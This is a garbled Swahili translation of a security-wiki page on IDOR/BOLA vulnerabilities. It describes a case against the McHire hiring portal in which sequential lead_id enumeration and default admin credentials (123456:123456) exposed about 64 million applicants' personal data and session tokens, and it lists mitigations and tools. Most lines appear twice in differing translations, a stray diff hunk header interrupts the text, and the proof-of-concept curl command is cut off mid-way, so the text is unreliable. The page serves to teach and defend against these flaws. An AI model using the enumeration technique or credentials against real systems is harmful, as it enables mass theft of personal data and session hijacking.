Wakati wa tathmini ya portal ya ajira ya **McHire** inayotumia Paradox.ai, IDOR ifuatayo iligunduliwa:
* Endpoint: `PUT /api/lead/cem-xhr`
* Authorization: cookie ya kikao cha mtumiaji kwa akaunti ya mtihani ya **yoyote** ya mgahawa
* Body parameter: `{"lead_id": N}` kitambulisho cha nambari **za mpangilio** za tarakimu 8
* Authorization: cookie ya session ya mtumiaji kwa **any** akaunti ya mtihani ya mgahawa
* Body parameter: `{"lead_id": N}` kitambulisho cha nambari cha tarakimu 8, **mfuatano**
Kwa kupunguza `lead_id`, mtathmini alirejesha taarifa za waombaji **kamili za PII** (jina, barua pepe, simu, anwani, mapendeleo ya zamu) pamoja na **JWT** ya mtumiaji ambayo iliruhusu kuiba kikao. Uhesabuji wa anuwai `1 64,185,742` ulifunua takriban **milioni 64** za rekodi.
Kwa kupunguza `lead_id`, mtahasi alipata PII kamili za waombaji (jina, e-mail, simu, anwani, mapendeleo ya zamu) pamoja na JWT ya mteja iliyoruhusu session hijacking. Kuorodhesha anuwai `1 64,185,742` kulifunua takriban **64 million** rekodi.
Ombi la Ushahidi wa Dhihirisho:
Proof-of-Concept request:
```bash
curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
@ -56,30 +76,31 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
---
## 3. Athari za IDOR / BOLA
* Kupanua kwa usawa soma/update/futa data za **watumiaji wengine**.
* Kupanua kwa wima mtumiaji mwenye mamlaka ya chini anapata kazi za kiutawala pekee.
* Uvunjaji wa data kwa wingi ikiwa vitambulisho ni vya mfululizo (mfano, vitambulisho vya waombaji, ankara).
* Kuchukua akaunti kwa kuiba tokeni au kuweka upya nywila za watumiaji wengine.
* Kupanda kwa usawa kusoma/kuhariri/kufuta **data za watumiaji wengine**.
* Kupanda kwa wima mtumiaji mwenye vibali vidogo anapata utendakazi unaotengwa kwa admin pekee.
* Uvujaji mkubwa wa data ikiwa vitenambulisho ni mfululizo (mfano: vitambulisho vya waombaji, ankara).
* Uchukuzi wa akaunti kwa kuiba tokens au kwa kuweka upya nywila za watumiaji wengine.
---
## 4. Njia za Kupunguza & Mbinu Bora
1. **Tekeleza ruhusa ya kiwango cha kitu** kwenye kila ombi (`user_id == session.user`).
2. Prefer **vitambulisho visivyoweza kudhaniwa** (UUIDv4, ULID) badala ya vitambulisho vya kuongezeka kiotomatiki.
3. Fanya ruhusa **seva upande**, usitegemee maeneo ya siri ya fomu au udhibiti wa UI.
4. Tekeleza **RBAC / ABAC** ukaguzi katika middleware kuu.
5. Ongeza **kikomo cha kiwango & ufuatiliaji** kugundua kuhesabu vitambulisho.
6. Jaribu usalama kila mwisho mpya (kitengo, muunganiko, na DAST).
## 4. Uzuiaji & Mbinu Bora
1. **Lazimisha idhinishaji kwa kiwango cha kipengee** kwenye kila ombi (`user_id == session.user`).
2. Pendelea **vitenambulisho visivyo vya moja kwa moja, visivyoweza kubahatishwa** (UUIDv4, ULID) badala ya auto-increment IDs.
3. Fanya idhinishaji upande wa server (server-side), usitegemee maeneo ya fomu yaliyofichwa au controls za UI.
4. Tekeleza ukaguzi wa **RBAC / ABAC** katika middleware ya kati.
5. Ongeza **rate-limiting & logging** kugundua uorodheshaji wa IDs.
6. Testi kiusalama kila endpoint mpya (unit, integration, na DAST).
---
## 5. Zana
* **BurpSuite extensions**: Authorize, Auto Repeater, Turbo Intruder.
* **OWASP ZAP**: Auth Matrix, Forced Browse.
* **Github projects**: `bwapp-idor-scanner`, `Blindy` (uwindaji wa IDOR kwa wingi).
* **Github projects**: `bwapp-idor-scanner`, `Blindy` (bulk IDOR hunting).
## Marejeleo
## Marejeo
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
* [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../banners/hacktricks-training.md}}